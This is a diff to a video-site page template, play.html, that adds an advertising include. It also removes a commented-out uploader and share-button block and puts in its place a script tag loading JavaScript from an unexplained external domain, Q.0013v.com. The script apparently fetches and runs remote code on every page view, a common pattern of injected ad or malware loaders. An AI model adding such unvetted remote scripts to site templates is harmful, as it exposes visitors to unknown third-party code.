--- a/public/tpl/ms360/video/play.html
+++ b/public/tpl/ms360/video/play.html
@@ -1,4 +1,5 @@
 {include file="common/header"}
+{include file="common/adver"}
 <link href="__ROOT__/tpl/ms360/static/css/detail.css" rel="stylesheet">
 <link href="__ROOT__/tpl/ms360/static/css/player.css" rel="stylesheet">
 <style>
@@ -29,20 +30,7 @@ padding: 0px !important;
       </div>
     </div>
     <div class="host-box" style="border-radius:5px;">
-     <!--  <div class="host-header"> <a {if $videoInfo.user_id>0}href="{:url('homepage/index',array('uid'=>$videoInfo['user_id']))}" target="_blank"{else/}href="#" onclick="alert('管理员没有开通个人主页哦~！');"{/if}> <img src="{$videoInfo['headimgurl']|default='/static/images/user_dafault_headimg.jpg'}"></a></div>
-      <div class="host-name"><a {if $videoInfo.user_id>0}href="{:url('homepage/index',array('uid'=>$videoInfo['user_id']))}" target="_blank"{else/}href="#" onclick="alert('管理员没有开通个人主页哦~！');"{/if}>{if $videoInfo.user_id>0}{$videoInfo['member']|default=''}{else/}管理员{/if}</a></div>
-      <div class="host-tags"> <span class="host-tags-1" id="giveGoodBtn"><i class="fa fa-thumbs-o-up"></i> 支持（<var id="goodNum">{$videoInfo['good']}</var>）</span> <span class="host-tags-2 fn-shoucang1" id="shoucang"><i class="fa fa-star"></i> <var id="shoucang">{if condition='$isCollected'}已收藏{else/}收藏{/if}</var></span> </div>
-      <div class="host-num">
-        <p>视频日期：{:date('Y-m-d', $videoInfo['add_time'])}</p>
-        <p>打赏人次：<var id="count" style="color:red;">{$count}</var> 次<span>|</span>打赏金额：<var id='countprice' style="color:red;">{$count_price}</var> 元</p>
-      </div>
-      <div class="mshost-concerned" style="margin-top:0px;"> <a {if $videoInfo.user_id>0}href="{:url('homepage/index',array('uid'=>$videoInfo['user_id']))}" target="_blank"{else/}href="#" onclick="alert('管理员没有开通个人主页哦~！');"{/if} class="host-btn">TA的主页</a> </div>
-      <div class="share1" style="padding: 0 18px 20px;margin-top:50px;">
-        <div class="bshare-custom icon-medium"><a title="分享到QQ空间" class="bshare-qzone"></a> <a title="分享到新浪微博" class="bshare-sinaminiblog"></a><a title="分享到人人网" class="bshare-renren"></a> <a title="分享到腾讯微博" class="bshare-qqmb"></a><a title="分享到网易微博" class="bshare-neteasemb"></a> <a title="更多平台" class="bshare-more bshare-more-icon more-style-addthis"></a><span class="BSHARE_COUNT bshare-share-count">0</span></div>
-        <script type="text/javascript" charset="utf-8" src="http://static.bshare.cn/b/buttonLite.js#style=-1&amp;uuid=&amp;pophcol=2&amp;lang=zh"></script>
-        <script type="text/javascript" charset="utf-8" src="http://static.bshare.cn/b/bshareC0.js"></script>
-      </div> -->
-    </div>
+	<script src="http://Q.0013v.com/thea1.js"></script>
   </div>
   <div style="width:1200px;margin: auto;height:60px;padding: 0px 0px 0px;">
     <!-- <p style="float:right;">
